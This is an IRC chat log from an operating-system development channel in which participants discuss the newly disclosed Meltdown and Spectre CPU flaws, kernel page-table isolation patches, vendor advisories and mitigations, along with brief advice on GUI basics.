15:22:51 --- join: jjuran (~jjuran@c-73-132-80-121.hsd1.md.comcast.net) joined #osdev
15:22:55 <graphitemaster> right
15:23:02 <graphitemaster> I know what it means I just mean if you didn't do that for branches
15:23:10 <graphitemaster> if you disabled that
15:23:24 <graphitemaster> I imagine the performance hit would be less than the current patches attempting to fix the problem
15:23:53 <Griwes> probably
15:24:23 --- quit: because (Ping timeout: 260 seconds)
15:24:31 <doug16k> think so? I'll take fast loop execution over some TLB flushes at syscalls
15:24:43 <Griwes> yeah
15:24:53 <Griwes> I mean I guess it depends on what program you're running
15:25:20 <Griwes> but I'd imagine that branch prediction is significant enough to hurt more when disabled
15:25:38 <graphitemaster> except branch prediction does not rely on speculative
15:25:52 <graphitemaster> branch prediction can still work
15:26:05 <Griwes> what does branch prediction do without speculative exec? prefetch the icache?
15:26:13 <doug16k> you still talking about making branches serializing?
15:26:27 --- quit: dbittman|work (Read error: Connection reset by peer)
15:26:33 --- join: because (ayy@cpe-76-173-133-37.hawaii.res.rr.com) joined #osdev
15:27:01 <graphitemaster> Griwes, basically prefetch into icache, yes
15:27:08 <graphitemaster> and also any data dependencies if it's a loop
15:27:16 <Griwes> I'd imagine that's not very significant
15:27:29 <Griwes> doesn't help with tight loops, for example, since the icache is already populated
15:27:55 <graphitemaster> well speculative execution doesn't really help in loops anyways unless you loop body is insignificant enough that it can be executed before you hit the top again
15:28:16 <graphitemaster> and if your loop body is like that you benefit more from manual unrolling anyways
15:28:53 <cr1901_modern> why not?
15:28:58 <graphitemaster> which compilers do anyways
15:29:04 <clever> ive seen a case where clang ran the entire loop at compile time, because the inputs where constant
15:29:20 --- quit: svk (Ping timeout: 240 seconds)
15:29:25 <clever> so what was originally meant to be an example of how well something could perform a dumb loop, turned into 10 instructions
15:29:45 <graphitemaster> yes compilers are cool
15:29:55 <cr1901_modern> well why doesn't speculative execution really help in loops anyways*?
15:30:07 --- quit: empy (Ping timeout: 252 seconds)
15:30:09 <graphitemaster> I said it only helps if your loop body is small enough
15:30:18 <Griwes> graphitemaster, and what do you suppose I meant by a "tight loop"? :P
15:30:31 <graphitemaster> compilers unroll tight loops
15:30:41 <graphitemaster> because that tends to be better for speculative execution :P
15:31:39 <Griwes> ...unless they failed to do so... :P
15:31:59 <cr1901_modern> graphitemaster: Well why does it only help if the loop body is small enough :P?
15:32:01 <Griwes> relying on the compiler to always be smarter than the CPU is what killed Itanium, remember? :P
15:33:38 <graphitemaster> Itanium died because Itanium was a garbage arch
15:33:44 <graphitemaster> not because compilers were bad
15:33:47 <doug16k> unrolling is bad for the latest processors. if you exceed the size of the microop cache then it has to decode every pass through the loop
15:36:14 <doug16k> in other words, if a loop is short enough, all the potential stalls because of instruction size or decode parallelism disappear, and it can flood the reorder buffer with ops at an extremely high rate
15:36:59 --- quit: floatleft (Read error: Connection reset by peer)
15:39:19 <graphitemaster> doug16k, still a huge micro-opt
15:39:32 <graphitemaster> in the grand scheme of things it would be irrelevant/unmeasurable
15:39:42 <graphitemaster> as a system wide sort of metric
15:39:50 <graphitemaster> only matters in microbench and synthetic workloads
15:44:43 --- quit: xenos1984 (Quit: Leaving.)
15:45:15 <geist> graphitemaster: *you*re a synthetic workload
15:45:54 <graphitemaster> geist, come at me bro, I'll eat your fucking work lunch.
15:46:05 <graphitemaster> <3
15:47:55 <lava> :]
15:48:00 <lava> now all of you have to implement kaiser
15:48:04 <lava> cheers to you too!
15:48:20 <cr1901_modern> what if I make my OS AMD-only?
15:48:31 <cr1901_modern> (n.b. I don't have one)
15:48:48 <lava> spectre works super nicely on AMD
15:49:03 <lava> colleague sitting at the next desk implemented that
15:49:39 <cr1901_modern> Then why doesn't AMD need the PTI code?
15:50:03 --- join: alphawarr1or (uid243905@gateway/web/irccloud.com/x-omorthaujhnhropf) joined #osdev
15:50:17 <Griwes> because they do the appropriate privilege checks for memory accesses during speculative execution
15:50:38 <jjuran> https://googleprojectzero.blogspot.co.uk/2018/01/reading-privileged-memory-with-side.html
15:50:39 <bslsk05> ​googleprojectzero.blogspot.co.uk: Project Zero: Reading privileged memory with a side-channel
15:50:41 <cr1901_modern> I thought that's what kaiser did?
15:50:55 <cr1901_modern> s/did/protected against/
15:51:00 <Griwes> kaiser is pti
15:51:23 <Griwes> normally you can't do a load on something not marked user accessible, but apparently, speculative execution could
15:51:28 <cr1901_modern> So AMD doesn't need the performance-crushing patch
15:51:40 <Griwes> that's how it seems to be right now
15:52:03 <cr1901_modern> And spectre isn't fixed by kaiser AIUI
15:52:48 <Griwes> I can't see how it can be fixed, other than by disabling speculative execution and/or branch prediction (still a little fuzzy on the and/or)
15:53:28 <cr1901_modern> (6:48:26 PM) lava: spectre works super nicely on AMD
15:54:07 --- quit: immersive (Quit: bye)
15:55:26 --- join: clickjack (~clickjack@90.95.19.47) joined #osdev
15:56:15 --- quit: jsgrant_ (Remote host closed the connection)
15:56:35 --- join: jsgrant_ (~jsgrant@71-11-142-172.dhcp.stls.mo.charter.com) joined #osdev
15:56:44 <lava> KPTI/Kaiser protects against Meltdown
15:56:46 <lava> not spectre
15:56:51 <lava> spectre works everywhere
15:56:54 <lava> basically
15:57:01 <Griwes> yes
15:57:27 <lava> meltdown only works if you can perform operations based on register values that are illegally fetched into the register temporarily
15:58:12 <Griwes> from what I understand, meltdown is literally spectre, but doing cross-ring reads because Intel people are badlets
15:59:05 --- quit: jsgrant_ (Remote host closed the connection)
16:00:17 <lava> from what I understand meltdown is just pipelining + a race condition for the privilege check
16:00:37 <lava> spectre is pipelining + branch prediction
16:00:42 <lava> so it's not the same
16:04:36 <froggey> lava: nice work
16:05:03 <lava> https://twitter.com/misc0110/status/948706387491786752
16:05:03 <bslsk05> ​twitter: <misc0110> Using #Meltdown to steal passwords in real time #intelbug #kaiser #kpti /cc @mlqxyz @lavados @StefanMangard @yuvalyarom https://meltdownattack.com/ https://video.twimg.com/tweet_video/DSp7SbVXcAAQ7FC.mp4
16:08:37 --- quit: sortie (Quit: Leaving)
16:09:46 <latentprion> Yuval is a cool guy
16:09:59 <latentprion> Really brilliant security guy -- from Israel of course
16:20:23 --- quit: ingrix (Ping timeout: 260 seconds)
16:20:55 --- join: MDude (~MDude@73.187.225.46) joined #osdev
16:21:05 --- join: MDead (~MDude@c-73-187-225-46.hsd1.pa.comcast.net) joined #osdev
16:21:07 --- join: MDead_ (~MDude@c-73-187-225-46.hsd1.pa.comcast.net) joined #osdev
16:23:14 --- join: MDead__ (~MDude@c-73-187-225-46.hsd1.pa.comcast.net) joined #osdev
16:26:22 --- quit: MDead_ (Ping timeout: 256 seconds)
16:26:22 --- quit: MDude (Ping timeout: 256 seconds)
16:26:22 --- quit: MDead (Ping timeout: 256 seconds)
16:26:30 --- nick: MDead__ -> MDude
16:29:08 --- quit: Nach0z (Ping timeout: 260 seconds)
16:29:25 --- quit: PointlessMan (Quit: Leaving)
16:29:25 <latentprion> What made intel think it was a good idea to speculatively execute, or even fetch at all
16:29:34 <latentprion> Ring0 instructions
16:29:38 <latentprion> From within ring3
16:29:51 <latentprion> What kind of stupidity made them do that?
16:30:56 --- quit: vaibhav (Quit: Leaving)
16:31:16 <Kazinsal> Performance race.
16:35:59 --- join: empy (~l@c-24-56-245-159.customer.broadstripe.net) joined #osdev
16:35:59 --- quit: empy (Changing host)
16:35:59 --- join: empy (~l@unaffiliated/vlrvc2vy) joined #osdev
16:36:46 <Griwes> but it's an incredibly dumb thing to do really
16:37:26 <Griwes> specially since the cost of the privilege check *should* be negligible compared to all the cache prefetching costs that we speculatively execute for
16:38:42 <latentprion> I think that going forward, all processor caches of all types should be isolated, and their isolation boundaries should be documented publicly without fail
16:38:48 <latentprion> Unpartitioned caches are getting stupid
16:39:28 <latentprion> Processors should no longer mix cached data between process boundaries, and should have multiple fast caches, that are hardware partitioned
16:39:42 <latentprion> Gernot Heiser has been complaining about cache partitioning for a long time
16:39:43 --- quit: because (Ping timeout: 264 seconds)
16:40:07 <latentprion> The other solution is to provide proper cache flushing instructions that actually do what they say they do
16:40:33 <latentprion> Because right now, it is actually impossible to rely on cache flushing instructions to do what they say they do
16:41:03 <latentprion> https://ts.data61.csiro.au/publications/csiro_full_text//Ge_YCH_toappear.pdf
16:41:18 --- join: because (ayy@cpe-76-173-133-37.hawaii.res.rr.com) joined #osdev
16:41:42 <latentprion> Basically, all the cache management instructions on especially intel processors do not actually work as described and do not enable proper partitioning
16:41:50 <Griwes> okay, so there's two issues here
16:42:17 <Griwes> one is meltdown, which is trivially mitigated by intel not being dumb and actually doing the privilege checks in speculative execution
16:42:40 <Griwes> the other issue is spectre and that is *not* mitigated by separating caches between processes
16:43:00 <Griwes> because you can use it to, say, read arbitrary data from the current process when you're inside a jit
16:43:26 <latentprion> No, I'm talking about the general class of problems created by the fact that processors do not properly implement the cache flushing/partitioning instructions their manuals describe
16:43:38 <latentprion> This leads to unmitigatable timing and side channels
16:43:54 <Griwes> and yet it doesn't mitigate same-process spectre, and the fix for meltdown is easier
16:43:55 <latentprion> It is literally impossible right now to properly eliminate timing channels on intel cpus
16:43:56 --- quit: bauen1 (Read error: Connection reset by peer)
16:44:06 <latentprion> You're missing my larger point
16:44:16 <latentprion> This is a much bigger issue than this current exploit
16:44:28 <latentprion> And it's been well understood for at least 2 years now
16:44:44 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
16:44:52 <latentprion> And there has been no effort from processor manufacturers to give the OS community the power to partition shared hardware resources
16:44:56 <Griwes> and you are missing my point
16:45:04 <latentprion> I brought up *my* point
16:45:05 <Griwes> you haven't proposed a thing that mitigates spectre
16:45:15 <latentprion> And you then started talking about I don't care what
16:45:30 <Griwes> what the...?
16:45:48 <latentprion> Thge fact that meltdown is just another spinoff of the problem is just a matter of eventuality
16:45:51 <Griwes> you brought a point and I pointed out that it's not really very relevant to the current problem
16:46:15 <latentprion> It is though; I just explained to you that cache partitioning is impossible even though the processors say it should be
16:46:27 <latentprion> If when we published our paper 2 years ago
16:46:31 <latentprion> Intel and ARM had listened to us
16:46:38 <latentprion> Then meltdown would not have occured
16:46:50 <latentprion> This is a problem that has been known about for years
16:47:22 <latentprion> And meltdown is frankly *not* the only problem in this space
16:47:24 <Griwes> okay, more of your points... meltdown is older than 2 years, no?
16:47:56 <Griwes> but again, meltdown is "trivially" (to the point of AMD not being vulnerable) by doing proper privilege checks
16:47:57 --- part: lijero left #osdev
16:48:12 <latentprion> I've been talking about partitioning either by actually partitioning caches in hardware, *OR* by properly implementing the very cache flushing instructions that intel and ARM claim to have implemented
16:48:18 <latentprion> Which do not work as described
16:48:20 <Griwes> and from what I understand, your proposed approach to this doesn't fix the spectre problem of reading whatever as a JS script
16:48:25 <latentprion> I.e, there is a microcode solution
16:48:35 <latentprion> Which could have been pushed out 2 years ago
16:48:36 <Griwes> please tell me how that fixes meltdown
16:48:41 <Griwes> and then how it fixes spectre
16:48:45 <latentprion> I don't care about specter
16:48:48 <Griwes> and also: this is not a microcode issue
16:48:55 <latentprion> I'm using meltdown as an angle to talk about a much bigger issue
16:49:10 <Griwes> ah, so you just made a point that's only relevant because both are about caches
16:49:23 <latentprion> At the end of the day, timing and side channels require a shared processor resource
16:49:27 <Griwes> and decided to claim that you know all solutions using that?
16:49:33 <latentprion> What are you talking about?
16:49:35 <Griwes> please explain how this fixes meltdown
16:50:06 <Griwes> <latentprion> If when we published our paper 2 years ago, Intel and ARM had listened to us, Then meltdown would not have occured
16:50:10 <Griwes> this is your claim
16:50:18 <Griwes> please explain how you'd've fixed it
16:51:23 <latentprion> If hardened kernels are able to actually use colouring and partitioning to keep data stored inside the processor isolated, then for example, our solution in seL4, which is to basically take advantage of cache colouring and actually colour all of RAM, as well as to flush aggressively
16:52:00 <latentprion> Would have been able to eliminate all channels; Meltdown is relevant because it's a prefetch, and part of the prefetch would have fetched our flush
16:52:08 <latentprion> The flush would have forced a pipeline stall
16:52:23 <latentprion> It's in the same class of problems we've been publishing about for 2 years
16:52:36 <Griwes> how would you flush when you are not the code that's being executed?
16:53:03 <latentprion> Meltdown prefetches instructions into the prefetch buffer
16:53:17 <latentprion> Part of those instructions would have been a flushing instruction
16:53:32 <latentprion> If the processor encounters a flush, even speculatively, it would have to stall the pipeline
16:53:36 <latentprion> Simple
16:54:02 <Griwes> you must be reading about a very different paper than what I'm reading
16:54:38 <latentprion> There are multiple papers; that one brings up the point that there is no consistent way to actually mitigate timing channels on Intel CPUs
16:54:39 --- quit: m_t (Quit: Leaving)
16:54:42 <Griwes> it's not your code that's fetched, it's data from arbitrary addresses due to a piece of code designed to time caching
16:54:44 <latentprion> We made significant progress on ARM
16:54:54 <latentprion> It's not from an arbitrary address
16:54:59 <latentprion> Do you even understand how meltdown works?
16:55:17 <Griwes> I think I do
16:55:25 <latentprion> Meltdown is a problem for KASLR because it allows you to determine the linkage of the kernel based on prefetching into ring0
16:55:31 <Griwes> and all I'm reading makes me more and more confident that I do
16:55:49 <latentprion> The thing that is prefetched allows you to determine where the kernel's SYSENTER/SYSCALL instruction vectors into
16:56:26 <latentprion> From there if you have a kernel image for that version of the kernel, you can use that image to determine the linkage of the rest of the kernel that is in RAM
16:56:54 <latentprion> From there, you can cause the CPU to fetch various bits of data by triggering read based on the behaviour of different syscalls
16:56:58 <Griwes> that is... not at all what I understand what it is
16:57:25 <latentprion> Speculative instruction fetching is not "arbitrary"
16:57:40 <latentprion> Modern intel CPUs branch prediction and speculation is usually within 90% or more accuracy
16:58:06 <latentprion> If the processor is speculatively fetching kernel instructions, it's obviously starting with fetching the kernel's SYSENTER/SYSCALL vector point
16:58:35 --- join: Nach0z (~nach0z@c-24-126-182-195.hsd1.ga.comcast.net) joined #osdev
16:58:35 --- quit: Nach0z (Changing host)
16:58:35 --- join: Nach0z (~nach0z@unaffiliated/nach0z) joined #osdev
16:58:47 <latentprion> From there, as with all other exploits, you engage in some complex set of shenanigans to gain more information and in combination with other techniques, you produce a holistic result
16:58:59 <Griwes> > Finally, we discuss a concrete implementation of Meltdown allowing to dump kernel memory with up to 503 KB/s.
16:59:13 <Griwes> how is this not "arbitrary data"
16:59:34 --- quit: caen23 (Ping timeout: 248 seconds)
16:59:54 <latentprion> I don't recall talking about whatever your paper's publishers chose to fetch with the prefetcher
16:59:58 --- quit: mniip (Ping timeout: 240 seconds)
17:00:02 <latentprion> I'm talking about how the prefetch exploit works
17:00:12 <Griwes> > The core instruction sequence of Meltdown. An inaccessible kernel address is moved to a register, raising an exception. The subsequent instructions are already executed out of order before the exception is raised, leaking the content of the kernel address through the indirect memory access.
17:00:34 <latentprion> Griwes: Are you reading what you're pasting?
17:00:39 <Griwes> yes
17:00:39 <latentprion> That's what I just typed
17:01:15 <Griwes> what I pasted literally says "load the address you want to probe into a register [rcx in this case] and do this to probe it"
17:01:50 <Griwes> > By repeating these steps for different memory locations, the attacker can dump the kernel memory, including the entire physical memory.
17:02:22 <Griwes> I'm trying to understand how your proposed fixes mitigate this attack
17:02:39 <Griwes> since the discussion prior to your claim was literally about this attack for solid couple of hours
17:03:07 <latentprion> Okay, that's not what I read: the meltdown bug exposes the location of the kernel's linkage by prefetching the kernel's SYSENTER entry point
17:03:22 <latentprion> And then allows for KASLR to be reliably bypassed
17:03:23 <Griwes> ...not according to the meltdown paper
17:03:43 <latentprion> I am not sure about the angle you're describing there
17:04:01 <Griwes> according to the meltdown paper, it allows you to dump the entire memory
17:04:09 --- join: dbittman (~dbittman@2601:647:ca00:1651:b26e:bfff:fe31:5ba2) joined #osdev
17:04:41 <latentprion> If you can speculatively read and then use that as a channel, you can use that to read any amount of data
17:04:47 <Griwes> what you're talking about seems to be a way to interpret the dumped memory, but that's really just a secondary thing
17:04:49 <latentprion> The amount of data you can read is not the problem
17:05:24 <Griwes> the core problem with meltdown is that speculative execution allows you to bypass privilege checks (because they aren't there)
17:05:33 <Griwes> how that is used is truly a derivative problem
17:05:52 <Griwes> and I fail to see how anything you're talking about mitigates this mechanism
17:06:15 <latentprion> Could you link me to the paper you're reading?
17:06:22 <Griwes> https://meltdownattack.com/meltdown.pdf
17:06:25 <latentprion> Thanks
17:06:30 --- quit: awang_ (Ping timeout: 248 seconds)
17:08:20 <Griwes> page 11, 6.1.1 is specifically what I'm talking about
17:09:34 --- join: mniip (mniip@unaffiliated/mniip) joined #osdev
17:09:52 --- quit: Love4Boobies (Remote host closed the connection)
17:10:29 <Griwes> and that is also specifically what AMD is not vulnerable to, since they do privilege checks (as they should)
17:12:21 --- join: Love4Boobies (~L4B@unaffiliated/l4b) joined #osdev
17:13:21 --- quit: Gaudasse (Ping timeout: 240 seconds)
17:13:21 --- quit: reda (Ping timeout: 240 seconds)
17:13:22 --- quit: darthdeus (Ping timeout: 268 seconds)
17:13:42 --- join: Gaudasse (~Gaudasse@bitwise.fr) joined #osdev
17:13:50 --- quit: CustosLimen (Ping timeout: 240 seconds)
17:13:50 --- quit: lxpz (Ping timeout: 240 seconds)
17:15:27 --- join: reda (~reda@unaffiliated/reda) joined #osdev
17:15:39 --- join: CustosLimen (~CustosLim@unaffiliated/cust0slim3n) joined #osdev
17:16:25 --- join: darthdeus (~darthdeus@catsocket.com) joined #osdev
17:16:26 --- join: lxpz (~lxpz@shiki.adnab.me) joined #osdev
17:16:47 --- quit: listenmore (Remote host closed the connection)
17:17:10 --- join: listenmore (~strike@2.27.123.231) joined #osdev
17:18:55 <latentprion> Griwes: Okay, our sources for now had been the LKML and web articles
17:19:10 <latentprion> I wasn't aware there was a published paper by Yuval on it
17:19:35 <Griwes> There's a writeup on project zero's blog on this
17:20:09 <Griwes> It seems they've been forced to disclose since someone made a PoC attack independently today
17:20:24 <latentprion> Yes, the original disclosure date was the 9th
17:24:00 --- join: wcstok (~Me@c-71-197-192-147.hsd1.wa.comcast.net) joined #osdev
17:26:23 --- join: awang_ (~awang@cpe-98-31-27-190.columbus.res.rr.com) joined #osdev
17:31:25 <Kazinsal> PoC works pretty well too
17:31:50 <Kazinsal> https://i.imgur.com/mCVHKwQ.jpg
17:31:57 <Kazinsal> "no page faults required, massaging everything in/out-of the right cache seems to be the crux"
17:32:06 <clever> https://googleprojectzero.blogspot.ca/2018/01/reading-privileged-memory-with-side.html https://developer.arm.com/support/security-update
17:32:07 <bslsk05> ​googleprojectzero.blogspot.ca: Project Zero: Reading privileged memory with a side-channel
17:32:07 <bslsk05> ​developer.arm.com: Arm Processor Security Update – Arm Developer
17:32:13 <clever> these 2 pages have the most info, from what ive seen
17:35:22 --- join: godel (~gonzalo@96-251-231-201.fibertel.com.ar) joined #osdev
17:35:42 <Kazinsal> NT kernel patch is in the wild
17:36:08 <Kazinsal> Results in non-I/O bound workloads and gaming: performace impact within margin of error.
17:41:10 --- quit: peterbjo1nx (Ping timeout: 256 seconds)
17:41:23 --- join: peterbjo1nx (~peterbjor@50709D65.static.ziggozakelijk.nl) joined #osdev
17:42:07 --- quit: peterbjornx (Ping timeout: 264 seconds)
17:42:56 --- join: peterbjornx (~peterbjor@50709D65.static.ziggozakelijk.nl) joined #osdev
17:46:48 --- quit: heat (Remote host closed the connection)
17:50:09 --- quit: Shamar (Quit: Lost terminal)
17:51:31 --- join: rmx86k (~troy1@2605:e000:7c8a:7200:d066:9635:2ea7:9cbb) joined #osdev
17:52:30 --- quit: kasumi-owari (Ping timeout: 256 seconds)
17:54:02 --- join: kasumi-owari (~kasumi-ow@ftth-213-233-237-007.solcon.nl) joined #osdev
17:54:42 --- join: variable (~variable@freebsd/developer/variable) joined #osdev
18:03:14 <Kazinsal> Oh neat someone's got a PoC to side-channel text as it's being typed
18:03:31 <Kazinsal> Computers were a mistake
18:04:40 <variable> +1
18:04:53 <variable> proof: they let me modify them
18:06:09 <geist> https://developer.arm.com/support/security-update turns out at least one of the ARM cores is directly hit by variant 3
18:06:36 <geist> and a new subvariant 3a specific to ARM: speculatively reading from a priviledged control register and then using it as a base register in a load
18:07:03 <variable> I wish I was back in academia
18:07:04 <geist> very nice document they put together talking about it all though. go ARM
18:07:30 <Kazinsal> "As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs "
18:07:34 <Kazinsal> JESUS H FUCKING CHRIST
18:08:07 <radens> all your cookies belong to us
18:08:26 <klange> computers were a mistake
18:09:16 <Kazinsal> let's just all go back to the days before integrated circuits
18:09:33 <Kazinsal> don't need no EFI gimme that carburetor
18:09:56 <klange> let's go back to the the days where only code you personally installed (possibly by writing it out of a magazine) runs on your computer
18:10:03 <klange> then the smart people can continue using computers for smart things
18:10:13 <geist> shit man, how about the only code is what you manually input with switches
18:10:16 <klange> and the rest of us can be spared their terribleness
18:10:31 <geist> or back when computers just sit there and computed stuff
18:10:32 --- quit: John__ (Read error: Connection reset by peer)
18:10:52 <radens> and then other smart people will exploit the shitty code you mistyped from a year old magazine.
18:11:07 <geist> yeah but only by coming over to your house and fiddling with the switches
18:11:13 <Kazinsal> when the height of computing technology was using a television transmitter to fuck with german air raid navigation
18:11:14 <geist> since by definition you didn't hook it up to the internets
18:11:50 <Kazinsal> (bonus of going back to that era: we get to beat nazis again)
18:12:56 --- join: lijero (~lijero@unaffiliated/lijero) joined #osdev
18:13:44 <radens> how very nice and straightforward of the arm people.
18:14:12 --- quit: tacco\unfoog ()
18:15:07 --- join: Arcaelyx_ (~Arcaelyx@2601:646:c200:27a1:4558:7f8f:5fbb:1a99) joined #osdev
18:15:44 <Kazinsal> at least the 68k isn't vulnerable
18:17:35 <geist> man these are some pretty hard core changes: https://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux.git/commit/?h=kpti&id=414c3263750481a580fcc9e01d056119bb3a78fb
18:17:35 <bslsk05> ​git.kernel.org: kernel/git/arm64/linux.git - AArch64 Linux kernel port
18:18:18 --- quit: gdh (Quit: Leaving)
18:18:40 --- quit: Arcaelyx (Ping timeout: 255 seconds)
18:23:22 <radens> geist: what's going on there? Do both the bl 2f and b . branches share a slot in the branch prediction table or something?
18:23:55 <geist> dunno precisely
18:23:58 <Mutabah> Iirc, x30 is the link register
18:23:58 <variable> some some great and readable code
18:24:16 <Mutabah> So... the `bl` stores in the ret stack that the next `ret` will go to the `b .`
18:24:28 <geist> yeah i think that's the idea
18:24:37 <Mutabah> but since x30 has been changed, the `ret` actually goes to the actual vector code
18:24:45 <Mutabah> which means that the `ret` is mispredicted
18:24:51 <geist> yeah
18:24:57 <variable> kind of sucks that this is done in a way that is difificult to change later should CPU vendors ever fix the underlying flaw
18:25:28 <Mutabah> The above? Not really hard to change... and probably isn't really expensive in the scheme of things?
18:25:34 --- quit: daniele_athome (Ping timeout: 252 seconds)
18:25:52 <variable> Mutabah: by hard to change, I mean in a way that can be done at run/compile time
18:25:56 <variable> not "git revertable"
18:25:58 <Mutabah> Ah.
18:26:11 <Mutabah> Depends on the size of this trampoline, could just be bypassed
18:26:18 <Mutabah> (as in, a separate code path)
18:26:42 <variable> there is a *lot* of micro-optimization that was happening over the years
18:26:43 <Kazinsal> I mean we should have been doing something like FUCKWIT from the start
18:26:45 <radens> the kernel page table isolation stuff is all runtime configurable
18:26:49 <variable> in the scheme of things it may not matter
18:27:05 <variable> but still, kind of sad to lose all of that
18:27:40 --- join: daniele_athome (~daniele_a@93-40-14-81.ip36.fastwebnet.it) joined #osdev
18:29:07 <radens> however, there's also a mitigation for the the indirect branching attack being discussed on the LKML today which uses replaces all indirect branches in the kernel with pushes and rets. Which is interesting because then we might be able to attack the return address predictor, and that sort of indirect push and ret is still a very nice gadget for other attacks.
18:30:48 <geist> Kazinsal: really much of this is due to the way x86's page tables work, and the fact that it's such a win to have it mapped all the time
18:30:57 <geist> not all arches have had this problem, but x86 and ARM are basically what we're left with
18:31:13 <geist> and ARM is just straight up copying x86 as far as overall design of this sort of thing. wisely, really
18:32:22 --- quit: awordnot (Read error: Connection reset by peer)
18:32:42 --- join: awordnot (~awordnot@67.184.137.130) joined #osdev
18:34:02 <raphaelsc> has anybody found a way to implement speculative syscall table lookup? like this one: https://i.imgur.com/mCVHKwQ.jpg anyway, i think i can wait for security researches to release the demo next week ;-)
18:36:03 <radens> raphaelsc: you may find appendix A of this paper interesting, although it's not what you're looking for: https://spectreattack.com/spectre.pdf
18:37:00 --- join: uvgroovy (~uvgroovy@c-65-96-163-219.hsd1.ma.comcast.net) joined #osdev
18:37:01 --- quit: uvgroovy (Remote host closed the connection)
18:38:16 --- quit: rmx86k (Quit: Leaving)
18:38:48 --- join: uvgroovy (~uvgroovy@2601:184:4980:e75:7c6d:11a4:1efc:1289) joined #osdev
18:40:41 <geist> hmm, reading through the ARM KAISER patches, sadly the ASID bits do not seem to be quite as flexible as i thought
18:40:55 <geist> so i think you realistically have to TLB swap the kernel as well
18:41:23 <geist> or more specifically, you can't share kernel TLB entries across context switches, you have to switch to a new kernel ASID, thus causing it to bring in all new entries
18:41:47 <geist> since ARM has two top level translation tables for both halves of the system, but only a single ASID globally
18:42:34 <radens> it kind of seems like ARM could have dodged this bullet by having the two TBRRs not share a single TLB.
18:42:36 --- join: curiosity_freak (~naveen@157.50.12.253) joined #osdev
18:43:11 <curiosity_freak> anyone here know about developing GUI for os?
18:43:35 <Mutabah> A bit... fire away
18:43:37 <geist> without the KAISER thing it's almost perfectly ideal, because you just mapped the kernel with the nG bit (opposite polarity to x86's G bit)
18:43:57 <geist> and thus the kernel was always in functionally a separate ASID from the TLBs point of view
18:43:58 <klange> curiosity_freak: sure
18:44:19 <curiosity_freak> i know about FPS - frame per second
18:44:40 <curiosity_freak> every second screen is redrawn multiple times.
18:45:06 <curiosity_freak> where these pixel values are stores how these pixel values or calculated?
18:45:28 <curiosity_freak> if there is any book or any resources please suggest me
18:45:38 <curiosity_freak> i can't sleep for few days
18:45:49 <curiosity_freak> it keeps poping up in mind
18:46:05 <curiosity_freak> your help would be really appreciated.
18:46:21 <raphaelsc> radens: thanks.
18:47:38 <curiosity_freak> klange: you there?
18:47:53 <klange> I would start with literally anything about the basics of computer graphics.
18:48:04 <klange> GUIs are not about graphics, despite what the G stands for
18:48:16 --- quit: variable (Quit: Found 1 in /dev/zero)
18:49:00 <curiosity_freak> any book to learn about working of GUI deeply
18:49:12 --- quit: uvgroovy (Ping timeout: 265 seconds)
18:49:33 <curiosity_freak> i searched a google lot but could not find any resources for internels of GUI
18:50:20 --- join: quc (~quc@host-89-230-166-189.dynamic.mm.pl) joined #osdev
18:50:42 --- join: regreg_ (~regreg@85.121.54.224) joined #osdev
18:50:52 <freakazoid0223> https://meltdownattack.com/meltdown.pdf https://spectreattack.com/spectre.pdf
18:52:09 <curiosity_freak> klange: are you busy?
18:52:12 <geist> freakazoid0223: welcome to earlier today
18:52:17 <klange> i'm sick, actually
18:52:24 <klange> which is worse than busy
18:52:31 <Kazinsal> Trying to find post-update Windows benchmarks for Zen
18:53:10 <Kazinsal> klange: disappointed high five, sick buddy
18:53:26 <klange> let's not touch each other, might spread things one way or the other
18:53:26 <freakazoid0223> thats not just the news reports those are a lot more in depth
18:53:30 <Mutabah> curiosity_freak: In a modern compositing GUI structure - there's a "framebuffer" for every window, and then another framebuffer for every monitor.
18:54:13 <Mutabah> curiosity_freak: Applications draw to their window framebuffer, then tell the compositor that it's changed and the compositor will copy from the window buffer to the monitor buffer (which is then read by the graphic card periodically to send to the screen)
18:55:22 <curiosity_freak> Mutabah: thank you! is there any resources to learn about it? so i won't disturb you for my silly questions.
18:55:38 <Mutabah> I don't know of any off the top of my head
18:55:54 <curiosity_freak> Mutabah: it's okay
18:56:05 <Kazinsal> It's not really something I think books generally get written on
18:56:29 --- quit: raph_ael (Quit: WeeChat 1.9.1)
18:56:32 <curiosity_freak> fine.
18:56:38 <Kazinsal> The art of the GUI was originally trial and error, which got us such horrors as X11
18:56:47 <doug16k> curiosity_freak, look at some GUI frameworks to get an idea of what you need to do
18:56:58 --- part: lijero left #osdev
18:57:51 <curiosity_freak> doug16k: sure , i am going to have a look
19:00:38 --- quit: Belxjander (Ping timeout: 248 seconds)
19:01:19 <doug16k> curiosity_freak, and have a look at FreeType for font rendering. Get some basic line drawing, rectangle filling, bitblt (copy rectangle from here to there) code working
19:02:17 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
19:02:27 <curiosity_freak> doug16k: thank you
19:04:12 --- quit: curiosity_freak (Quit: Leaving)
19:06:26 <Kazinsal> Amazing. Mozilla's mitigation for this is toreduce the resolution of the Firefox performance timer to 20 microseconds
19:09:34 --- quit: Belxjander (Ping timeout: 256 seconds)
19:09:38 --- join: aosfields_ (~aosfields@71.194.3.30) joined #osdev
19:12:11 --- quit: adam4813 (Quit: Connection closed for inactivity)
19:12:18 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
19:12:25 --- join: uvgroovy (~uvgroovy@2601:184:4980:e75:7c6d:11a4:1efc:1289) joined #osdev
19:18:51 <jjuran> Not sure if sarcastic
19:22:00 --- quit: aosfields_ (Remote host closed the connection)
19:23:03 --- quit: darklink (Ping timeout: 265 seconds)
19:23:17 --- join: darklink (~darklink@unaffiliated/darklink) joined #osdev
19:26:49 --- join: aosfields_ (~aosfields@71.194.3.30) joined #osdev
19:26:50 <Kazinsal> KPTI patches for ESXi 5.5, 6.0, 6.5 are out
19:31:13 <Kazinsal> Linux 4.15 will be disabling FUCKWIT on AMD
19:32:13 <latentprion> AMD stock price up
19:32:18 <latentprion> INTC stock price down
19:32:49 <_mjg> well, it did turn out there was confusion
19:33:00 <_mjg> everyone thought there is *one* vuln and amd does not have it
19:33:29 <geist> right
19:33:56 <__pycache__> Kazinsal: they merged that one?
19:33:58 <__pycache__> whew
19:34:10 <__pycache__> AMD execs must be smug as hell right now
19:34:14 <geist> well, there was alkways a switch to disable it
